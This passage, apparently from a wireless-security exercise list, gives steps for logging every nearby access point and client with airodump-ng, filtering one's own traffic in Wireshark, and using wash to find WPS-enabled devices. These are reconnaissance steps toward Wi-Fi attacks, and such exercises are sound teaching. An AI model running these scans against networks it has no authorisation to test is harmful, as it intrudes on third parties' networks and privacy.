airodump-ngand log every AP and connected client within range. - Open Wireshark and build a display filter that isolates only traffic from your own Wi-Fi connection.
- Run
washagainst your monitor interface and identify any nearby devices with WPS enabled.








